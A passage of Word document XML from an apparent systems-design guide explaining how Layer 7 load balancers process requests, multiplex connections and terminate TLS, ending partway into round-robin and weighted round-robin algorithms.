        <w:t>4.3 How an L7 Load Balancer Processes a Request — Step by Step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5662566C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP handshake</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> with client (3-way handshake: SYN, SYN-ACK, ACK).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159A60ED" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS handshake</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> (if HTTPS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8528F5" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Client Hello → Server Hello, Certificate, Key Exchange → Client Key Exchange, Finished → Server Finished.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35811612" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>LB terminates TLS here. Holds the private key. Decrypts all traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34388CED" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP parsing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Read the HTTP request (method, path, headers, body if needed for routing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78833883" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Routing decision:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Apply rules to select a backend pool and specific server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1BE051" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backend connection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11795E78" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>If a persistent connection (keep-alive) to the chosen backend exists in the connection pool → reuse it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7829C94D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Otherwise, establish new TCP connection (+ optional TLS to backend for end-to-end encryption).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761C9983" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request forwarding:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Send the (possibly modified) request to the backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423A313F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>May add headers: X-Forwarded-For, X-Real-IP, X-Request-ID.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D802510" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>May strip headers: Connection, hop-by-hop headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481AB539" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Response processing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A72073" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Receive backend response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D94C652" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>May modify response (add CORS headers, compress with gzip, inject security headers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F89433B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>May cache the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE5099F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="279"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Response to client</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> over the original front-end connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AEF4C5" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 Connection Multiplexing — A Critical L7 Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F12BDF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792CB8B0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Clients open many connections (browsers open 6 per domain). 100,000 clients = 600,000 front-end connections. If each maps 1:1 to backend connections, backends need 600,000 connections (impossible for most applications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B63E5C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How multiplexing works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41833B18" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The LB maintains a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>connection pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> to each backend (e.g., 100 persistent connections per backend):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627EE23B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="280"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>600,000 front-end connections arrive at the LB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B9DB75" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="280"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The LB multiplexes requests from these connections onto just 100 backend connections per server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D24F22B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="280"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>A backend connection is borrowed for the duration of one request, then returned to the pool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6B2D38" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With HTTP/2 multiplexing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B28FC4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="281"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The LB can send hundreds of concurrent HTTP/2 streams over a SINGLE backend connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6442248C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="281"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>One TCP connection to the backend carries all in-flight requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58810099" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="281"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Reduces connection overhead dramatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6800E371" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> The LB absorbs the connection scaling problem. Backends see a manageable, constant number of connections regardless of client count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05225B8B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5 SSL/TLS Termination — Why It's Done at the LB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121E8FC8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Computational cost of TLS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397EAC8B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="282"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>RSA key exchange: ~1ms of CPU per new connection (2048-bit key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAE35E0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="282"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>ECDHE key exchange: ~0.5ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7555A2FF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="282"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Symmetric encryption: negligible (hardware-accelerated AES-NI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715AFB8F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>By terminating TLS at the LB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A717E95" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Backends don't spend CPU on cryptography.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F11E7AD" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The LB can be equipped with specialized hardware (TLS accelerator cards) or use optimized libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF1D7F9" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Certificate management is centralized (one place to rotate certs, not every backend).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F75CAD" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="283"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The LB can inspect HTTP content (for routing, caching, WAF rules).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AB1E01" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backend communication options after termination:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAAFF4D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="284"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Plain HTTP to backend (most common):</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Traffic between LB and backend is unencrypted. Acceptable if the internal network is trusted (same VPC, encrypted at the network layer).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E111F64" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="284"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Re-encryption:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> LB terminates client TLS, then establishes NEW TLS to the backend. Provides end-to-end encryption. Costs CPU but required for compliance in some environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EE00E4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="284"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS passthrough:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> LB doesn't terminate TLS at all. Inspects SNI only for routing, forwards encrypted traffic. Backend handles TLS. (Loses all L7 capabilities.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A50231" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.6 L7 Disadvantages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F520A0F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="285"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Higher latency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Full protocol parsing adds 0.5–5ms per request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3958CFBF" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="285"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Higher resource consumption:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Must maintain per-request state, parse HTTP, buffer bodies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F269440" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="285"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection bottleneck:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Since all traffic flows through (unlike DSR), the LB's bandwidth is the ceiling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26122821" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="285"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Protocol-specific:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> An L7 HTTP LB can't handle arbitrary TCP protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219A3B67" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:pict w14:anchorId="7EDE5515">
          <v:rect id="_x0000_i2674" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E5A7D9" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Load Balancing Algorithms — Deep Technical Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696509F8" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Round Robin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643C5CA3" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABAC87B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Maintain a counter (starts at 0).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAA0CC5" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="286"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>For each new request: server = servers[counter % N]; counter++.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B8C599" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal state:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> One integer (the counter).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038144DE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Strengths:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Zero overhead. Perfectly even distribution over time. No knowledge of backend state needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113BBAAA" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weaknesses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B74C035" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="287"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Assumes all servers are equal (same capacity, same speed). If Server A is 2x as powerful as Server B, Round Robin wastes A's capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FE90CB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="287"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t>Assumes all requests are equal. In reality, some requests take 10ms (cache hit), others take 5s (complex query). A server unlucky enough to get several expensive requests becomes overloaded while others are idle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29055F90" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="287"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>No awareness of current server load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2FEA68" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Weighted Round Robin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F40827B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
